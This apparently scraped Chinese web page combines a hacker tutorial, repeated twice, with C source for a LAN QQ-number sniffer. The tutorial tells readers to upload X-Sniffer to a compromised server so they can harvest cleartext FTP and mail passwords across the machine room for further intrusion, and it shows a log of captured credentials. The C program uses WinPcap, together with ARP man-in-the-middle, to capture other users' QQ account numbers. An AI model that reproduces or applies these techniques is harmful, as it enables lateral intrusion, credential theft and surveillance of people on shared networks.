61阅读

局域网qq嗅探器-嗅探局域网内所有密码

发布时间:2018-01-08 所属栏目:清除局域网访问密码

一 : 嗅探局域网内所有密码

嗅探局域网内所有密码.txt不要放弃自己! -------(妈妈曾经这样对我说,转身出门的一刹那,我泪流满面,却不想让任何人看见!) 看到这一句小编也心有感触,想起当初离家前往几千里外的地方的时候,妈妈也说过类似的话,但是身为男儿,必须创出一片天,才能报答父母的养育之恩!!大家好,今天给大家做个教程的名字叫较“嗅探局域网内的所有密码” 我的QQ是362978388 大家有什么问题尽管问我,我会耐心解答。我的BLog http://safely.blogbus.com/

废话少说 下面开始教程内容 有很多朋友提权拿到服务器以后还想继续入侵几台内网服务器,现在大部

服务器都是在内网的机房里 下面看我操作 用到这个工具 X-Sniffer 我这个是GUI版的 先传到服务器里

去 用FTP传吧 提醒一下 这个程序只能嗅探内网里的密码 大部分的密码 很牛逼 嗅探出密码我们就可以

下一步的入侵 使用很简单 按一下开始监听就可以了 下面我在服务器里做实验 我登陆我的FTP

看进来了 看看嗅探出来了吗 生成出一个pass.log 文件
TCP [10/27/07 23:28:31]
62.10.70.92->222.141.207.175 Port: 3905->25
MAIL FROM:<matheaw_wigfield@INJECTRON.COM> SIZE=699

TCP [10/27/07 23:28:32]
62.10.70.92->222.141.207.175 Port: 3905->25
RCPT TO:<gozarucaya@falani.net>

TCP [10/27/07 23:28:33]
222.141.207.175->222.39.217.204 Port: 3017->21
USER anonymous

TCP [10/27/07 23:28:33]
222.141.207.175->222.39.217.204 Port: 3017->21
PASS IEUser@

TCP [10/27/07 23:28:40]
222.141.207.175->222.39.217.204 Port: 3040->21
USER Panney

TCP [10/27/07 23:28:40]
222.141.207.175->222.39.217.204 Port: 3040->21
PASS password

TCP [10/27/07 23:28:41]
222.141.207.175->222.39.217.204 Port: 3044->21
USER Panney

TCP [10/27/07 23:28:41]
222.141.207.175->222.39.217.204 Port: 3044->21
PASS password

Panney是用户名 password 是密码 怎么样 这个可以嗅探整个机房的密码

不光是FTP 所有明文密码他都可以嗅探 好了 教程就到这里了

记住 有不明白的一定我加我的QQ:362978388 找不到工具的也可以问我要

我会耐心解答 88~

二 : 嗅探局域网内所有密码

嗅探局域网内所有密码.txt不要放弃自己! -------(妈妈曾经这样对我说,转身出门的一刹那,我泪流满面,却不想让任何人看见!) 看到这一句小编也心有感触,想起当初离家前往几千里外的地方的时候,妈妈也说过类似的话,但是身为男儿,必须创出一片天,才能报答父母的养育之恩!!大家好,今天给大家做个教程的名字叫较“嗅探局域网内的所有密码” 我的QQ是362978388 大家有什么问题尽管问我,我会耐心解答。(www.61k.com)我的BLog http://safely.blogbus.com/ 废话少说 下面开始教程内容 有很多朋友提权拿到服务器以后还想继续入侵几台内网服务器,现在大部服务器都是在内网的机房里 下面看我操作 用到这个工具 X-Sniffer 我这个是GUI版的 先传到服务器里去 用FTP传吧 提醒一下 这个程序只能嗅探内网里的密码 大部分的密码 很牛逼 嗅探出密码我们就可以下一步的入侵 使用很简单 按一下开始监听就可以了 下面我在服务器里做实验 我登陆我的FTP看进来了 看看嗅探出来了吗 生成出一个pass.log 文件TCP [10/27/07 23:28:31]62.10.70.92->222.141.207.175 Port: 3905->25MAIL FROM:<matheaw_wigfield@INJECTRON.COM> SIZE=699TCP [10/27/07 23:28:32]62.10.70.92->222.141.207.175 Port: 3905->25RCPT TO:<gozarucaya@falani.net>TCP [10/27/07 23:28:33]222.141.207.175->222.39.217.204 Port: 3017->21USER anonymousTCP [10/27/07 23:28:33]222.141.207.175->222.39.217.204 Port: 3017->21PASS IEUser@TCP [10/27/07 23:28:40]222.141.207.175->222.39.217.204 Port: 3040->21USER PanneyTCP [10/27/07 23:28:40]222.141.207.175->222.39.217.204 Port: 3040->21PASS passwordTCP [10/27/07 23:28:41]222.141.207.175->222.39.217.204 Port: 3044->21USER PanneyTCP [10/27/07 23:28:41]222.141.207.175->222.39.217.204 Port: 3044->21PASS passwordPanney是用户名 password 是密码 怎么样 这个可以嗅探整个机房的密码 不光是FTP 所有明文密码他都可以嗅探 好了 教程就到这里了记住 有不明白的一定我加我的QQ:362978388 找不到工具的也可以问我要 我会耐心解答 88~

三 : winpcap编程之局域网QQ号码嗅探

在交换网络中,结合arp中间人,把别人的包转到自己机子上,分析QQ协议进行判断QQ号码。

/**//* QQ_sniff by xklxlmw*/

#include <pcap.h>

#pragma comment(lib, "wpcap.lib")

#pragma comment(lib, "Packet.lib")

#pragma comment(lib, "wsock32.lib")//hton()函数用到

#pragma pack(1)//内存对齐,使内存紧凑

/**//*

-----------------------------------------------------------------------------------------------------------------------

下面是以太网协议格式的定义

-----------------------------------------------------------------------------------------------------------------------

*/

struct ether_header

...{

u_int8_t ether_dhost[6];

/**//* 目的以太网地址 */

u_int8_t ether_shost[6];

/**//* 源以太网地址 */

u_int16_t ether_type;

/**//* 以太网类型 */

};

/**//* 下面是IP地址格式的定义 */

typedef u_int32_t in_addr_t;

/**//*

-----------------------------------------------------------------------------------------------------------------------

下面是IP协议格式的定义

-----------------------------------------------------------------------------------------------------------------------

*/

struct ip_header

...{

#if defined(WORDS_BIGENDIAN)

u_int8_t ip_version: 4, /**//* 版本 */

ip_header_length: 4; /**//* 首部长度 */

#else

u_int8_t ip_header_length: 4, ip_version: 4;

#endif

u_int8_t ip_tos;

/**//* 服务质量 */

u_int16_t ip_length;

/**//* 总长度 */

u_int16_t ip_id;

/**//* 标识 */

u_int16_t ip_off;

/**//* 偏移 */

u_int8_t ip_ttl;

/**//* 生存时间 */

u_int8_t ip_protocol;

/**//* 协议类型 */

u_int16_t ip_checksum;

/**//* 校验和 */

struct in_addr ip_souce_address;

/**//* 源IP地址 */

struct in_addr ip_destination_address;

/**//* 目的IP地址 */

};

/**//*

-----------------------------------------------------------------------------------------------------------------------

下面是UDP协议格式的定义

-----------------------------------------------------------------------------------------------------------------------

*/

struct udp_header

...{

u_int16_t udp_source_port;

/**//* 源端口号 */

u_int16_t udp_destination_port;

/**//* 目的端口号 */

u_int16_t udp_length;

/**//* 长度 */

u_int16_t udp_checksum;

/**//* 校验和 */

};

/**//*

-----------------------------------------------------------------------------------------------------------------------

下面是QQ协议格式的定义

-----------------------------------------------------------------------------------------------------------------------

*/

typedef struct qq_udp_header

...{

u_char   begin_tag;   //always 0x02 till now

u_short  sender_ver;  //client version, details below

u_short  qq_cmd;      //command code, QQ_CMD_XXX

u_short  sq_no;       //sequence number.

u_char   data[1];     //following are data.

};

#pragma pack()

unsigned int swapu32(unsigned int n) //u_int网络字节转换

...{

// In fact htonl() return it!

return(((n & 0xff000000) >> 24) | ((n & 0x000000ff) << 24) |

((n & 0x00ff0000) >> 8) | ((n & 0x0000ff00) << 8));

}

/**//*

=======================================================================================================================

下面是实现捕获和分析QQ协议数据包的函数定义

=======================================================================================================================

*/

qq_protocol_packet_callback(u_char *argument, const struct pcap_pkthdr *packet_header, const u_char *packet_content)

...{

static u_int QQ_Num;//QQ号

struct ip_header *pip_header;//IP协议数据变量

struct qq_udp_header *qq_protocol;//QQ协议数据变量

pip_header=(struct ip_header*)(packet_content + 14);//获得IP协议数据变量

qq_protocol = (struct qq_udp_header*)(packet_content + 14+20+8);//获得QQ协议数据变量

//判断QQ协议包,取QQ号 如果是01 00表示是发往服务器的包前面tag也是0x02,但QQ号不在原来位置//

if((qq_protocol->begin_tag==0x02)&&(qq_protocol->sender_ver==ntohs(0x0100)))

...{

if(QQ_Num!=swapu32( *(unsigned int*)(qq_protocol->data-1)))

...{

QQ_Num=swapu32( *(unsigned int*)(qq_protocol->data-1));

printf("监听到一个QQ号:%-10u IP: %s ",QQ_Num,inet_ntoa(pip_header->ip_souce_address));

//   printf("%x %x ",*(u_char*)(&(qq_protocol->begin_tag)+16),*(u_short*)(&(qq_protocol->sender_ver)+8));

}

}

if((qq_protocol->begin_tag==0x02)&&(qq_protocol->sender_ver!=ntohs(0x0100)))

...{

if(QQ_Num!=swapu32( *(unsigned int*)qq_protocol->data))

...{

QQ_Num=swapu32( *(unsigned int*)qq_protocol->data);

printf("监听到一个QQ号:%-10u IP: %s ",QQ_Num,inet_ntoa(pip_header->ip_souce_address));

//   printf("%x %x ",*(u_char*)(&(qq_protocol->begin_tag)+16),*(u_short*)(&(qq_protocol->sender_ver)+8));

}

}

if((*(u_char*)(&(qq_protocol->begin_tag)+16)==0x02)&&(*(u_short*)(&qq_protocol->sender_ver+8)==ntohs(0x0100)))

...{

if(QQ_Num!=swapu32( *(unsigned int*)(qq_protocol->data+15)))

...{

QQ_Num=swapu32( *(unsigned int*)(qq_protocol->data+15));

printf("监听到一个QQ号:%-10u IP: %s ",QQ_Num,inet_ntoa(pip_header->ip_souce_address));

}

}

}

/**//*

=======================================================================================================================

下面是实现捕获和分析UDP协议数据包的函数定义

=======================================================================================================================

*/

void udp_protocol_packet_callback(u_char *argument, const struct pcap_pkthdr *packet_header, const u_char *packet_content)

...{

struct udp_header *udp_protocol;

/**//* UDP协议数据变量 */

u_short source_port;

/**//* 源端口号 */

u_short destination_port;

/**//* 目的端口号 */

u_short length;

/**//* 长度 */

udp_protocol = (struct udp_header*)(packet_content + 14+20);

/**//* 获得UDP协议数据内容 */

source_port = ntohs(udp_protocol->udp_source_port);

/**//* 获得源端口号 */

destination_port = ntohs(udp_protocol->udp_destination_port);

/**//* 获得目的端口号 */

length = ntohs(udp_protocol->udp_length);

/**//* 获得长度 */

if((length!=0)&&(destination_port==8000))

qq_protocol_packet_callback(argument, packet_header, packet_content);

}

/**//*

=======================================================================================================================

下面是分析IP协议的函数的定义

=======================================================================================================================

*/

void ip_protocol_packet_callback(u_char *argument, const struct pcap_pkthdr *packet_header, const u_char *packet_content)

...{

struct ip_header *ip_protocol;

/**//* IP协议变量 */

ip_protocol = (struct ip_header*)(packet_content + 14);

/**//* 获得IP协议数据内容 */

switch (ip_protocol->ip_protocol)

...{

case 17:

udp_protocol_packet_callback(argument, packet_header, packet_content);

break;

/**//* 如果上层协议为UDP协议,就调用分析UDP协议的函数,注意此时的参数传递形式 */

default:

break;

}

}

/**//*

=======================================================================================================================

下面是分析以太网协议的回调函数的定义

=======================================================================================================================

*/

void ethernet_protocol_packet_callback(u_char *argument, const struct pcap_pkthdr *packet_header, const u_char *packet_content)

...{

u_short ethernet_type;

/**//* 以太网类型 */

struct ether_header *ethernet_protocol;

/**//* 以太网协议变量 */

ethernet_protocol = (struct ether_header*)packet_content;

/**//* 获得以太网协议数据内容 */

ethernet_type = ntohs(ethernet_protocol->ether_type);

/**//* 获得以太网类型 */

switch (ethernet_type)

...{

case 0x0800:

ip_protocol_packet_callback(argument, packet_header, packet_content);

break;

/**//* 上层协议为IP协议,就调用分析IP 协议的函数,注意参数的传递 */

default:

break;

}

}

void main()

...{

pcap_if_t *alldevs;

char error_content[PCAP_ERRBUF_SIZE];

/**//**//**//* 存储错误信息 */

pcap_t *pcap_handle;

/**//**//**//* winpcap句柄 */

bpf_u_int32 net_mask;

/**//**//**//* 掩码地址 */

bpf_u_int32 net_ip;

/**//**//**//* 网络地址 */

char *net_interface;

/**//**//**//* 网络接口 */

struct bpf_program bpf_filter;

/**//**//**//* BPF过滤规则 */

char bpf_filter_string[] = "ip";

/**//**//**//* 过滤规则字符串 */

// net_interface = pcap_lookupdev(error_content); //因为第一个是moden的网卡,所以不用这个

if (pcap_findalldevs(&alldevs,error_content) == -1)

...{

fprintf(stderr,"Error in pcap_findalldevs: %s ",error_content);

exit(1);

}

net_interface=alldevs->next->name;//得到第二个网卡(以太网卡)的名字

/**//**//**//* 获得网络接口 */

pcap_lookupnet(net_interface, &net_ip, &net_mask, error_content);

/**//**//**//* 获得网络地址和网络掩码 */

pcap_handle = pcap_open_live(net_interface, BUFSIZ, 1, 0, error_content);

/**//**//**//* 打开网路接口 */

pcap_freealldevs(alldevs); //释放接口结点链表

pcap_compile(pcap_handle, &bpf_filter, bpf_filter_string, 0, net_ip);

/**//**//**//* 编译过滤规则 */

pcap_setfilter(pcap_handle, &bpf_filter);

/**//**//**//* 设置过滤规则 */

if (pcap_datalink(pcap_handle) != DLT_EN10MB)

return ;

printf("开始嗅探QQ号码......... ");

pcap_loop(pcap_handle, - 1, ethernet_protocol_packet_callback, NULL);

/**//* 注册回调函数,循环捕获网络数据包,调用回调函数进行分析 */

pcap_close(pcap_handle);

/**//* 关闭Winpcap操作 */

}

编程中注意:对内存取值,数组名最好不要再用取地址运算

本文标题:局域网qq嗅探器-嗅探局域网内所有密码
本文地址: http://www.61k.com/1117281.html

61阅读| 精彩专题| 最新文章| 热门文章| 苏ICP备13036349号-1